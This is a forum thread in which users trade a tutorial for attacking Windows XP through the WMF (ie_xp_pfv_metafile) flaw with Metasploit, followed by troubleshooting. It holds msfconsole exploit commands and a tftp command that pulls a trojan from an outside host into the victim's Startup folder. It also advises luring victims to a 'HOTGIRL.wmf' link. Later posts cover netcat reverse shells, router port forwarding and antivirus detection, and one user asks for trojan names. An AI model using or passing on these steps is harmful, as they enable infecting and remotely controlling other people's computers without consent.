[mrgoolie]

that would indd be nice! :P

[txR]

Okaye guys, i discovered the exploit 3hours ago (have read on a news site that there is a new exploit for winxp) and now i bring the solution lool ! I downloaded metasploit framework & ie_xp_pfv_metafile.pm (this file must go in Metasploit Framework\home\framework\exploits\ie_xp_pfv_metafile.pm directory)

now look what u must do :


o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


+ -- --=[ msfconsole v2.5 [112 exploits - 74 payloads]


msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > show TARGETS

Supported Exploit Targets
=========================

0 Automatic - Windows XP / Windows 2003

msf ie_xp_pfv_metafile > set TARGET 0
TARGET -> 0
msf ie_xp_pfv_metafile > show payloads

Metasploit Framework Usable Payloads
====================================

win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_exec
PAYLOAD -> win32_exec
msf ie_xp_pfv_metafile(win32_exec) > set CMD calc.exe
CMD -> calc.exe
msf ie_xp_pfv_metafile(win32_exec) > check
[*] No check has been implemented for this module
msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.111:1051 using Windows XP, sending payload...


u can also use : set CMD "tftp -i x.x.x.x GET c:/server.exe c:/document and settings/all users/start menu/programs/startup/server.exe"

then just tell the victim to go on this website : http://your.ip.adress:8080/HOTGIRL.wmf and he is infected by your trojan..
enjoy !

also is there anyone here who knows the DOS command to start the telnet server instead of the service console ?
and any good FTP trojan name ?

cya

txR always brings the best to ya :D

[stay]

nice tut txR, now i know how to use metasploit, not onyl this exploit ;)
i also tried win32_reverse, used seh as exitfunction (if this maybe is important...), and listened with netcat for the shell:
nc -lvp 1234
however, when i click the link i only get

Quote

connect to [192.168.1.99]from pcname [192.168.1.99] 1897
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

what do i have to do that the shell isn't instantly closed?

[mrgoolie]

somebody knows where my error is in this tftp command?

tftp -i users.xxx.com/directory/ GET server.exe c:/documents and settings/all users/start menu/programma's/opstarten/server.exe

update: i think my problem is with the directory stuff i added to my server...

[VUGO]

Well,
somebody here have success in add a Download/Excute shellcode inside the .WMF file?
We need details about this method.
Thanks to all.
Regards...

Igor Marcel - Vugo Verbal Killer (VUGO) - vugo"at"hotmail.com
Information Security Consultant
"Linux is modism, BSD is a life style!"

[mrgoolie]

i m trying to make it work via a router. but cant find a way :angry:
i opened the port 8080 in my router en forwarded it to my internal ip.
but it doenst seem to work...
anybody?

[stay]

i only opened port 8080 in my router config and used win32_exec payload (CMD calc.exe) - works fine!
but can somebody help me with my reverse shell problem? (see my post before)

[mrgoolie]

stay, on Jan 5 2006, 01:59 PM, said:

i only opened port 8080 in my router config and used win32_exec payload (CMD calc.exe) - works fine!
but can somebody help me with my reverse shell problem? (see my post before)

so you opened port 8080 in your router and forwarded it to your internal ip?
and what did you use for localhost ? strange things...
look at this picture... anybody know what i did wrong?

http://users.skynet.be/fb059704/checkthis.JPG

[stay]

the lan ip, there's no other possibility (ok, in my case i used the mac address, my router has no option for redirecting to ips) - intern and extern port 8080.

@mrgoolie [after edititing image in post]
1) router config is right

for all others:
2) i think i and txR used http://www.frsirt.co...metafile.pm.php and not the built in one of metasploit
3) we used the built in win32_exec payload function of metasploit (see txR's tutorial)

[mrgoolie]

its indeed another one, i think you can see the difference because with the built in exploit in metasploit, you get
listening at http://xxx.xxx.xxx.xxx/
and with the one STAY uses, you see http://xxx.xxx.xxx.xxx/anything.wmf

[mrgoolie]

i f*cking hate my belkin router... cant find a solution after finding one for 2 hours now.
i just opened my port 8080 in my belkin router to my internal port 8080 and internal ip 192.168.2.9
when somebody makes a connection to http://217.xxx.xxx.xxx/anything.wmf there s an error saying
"can t connect to xxx.xxx.xxx.xxx"
and i wont give it up!
any hints or tips would be helpfull

[stay]

you forgot the port :P
http://[ip]:[port]/anything.wmf

[mrgoolie]

yeah i forget it here, but not when i tested it! i tested it with http://217.xxx.xxx.x...80/anything.wmf and doenst work either :angry:
i m gonna blow up my pc i think:)

[stay]

better blow up your outer, before my current i had one which also ignored so far every forwarded port ;)
btw try http://127.0.0.1:8080/test.wmf using MSIE

[mrgoolie]

alright, i tried with the port 1234 incoming port and then my internal port 8080
and it works, so i think maybe my provider blocks the port 8080, i dont know
so when a friend of me go to http://xxx.xxx.xxx.xxx:1234/test.wmf
it works, but his norton finds it:( and when he disables his norton, calc.exe doenst start up.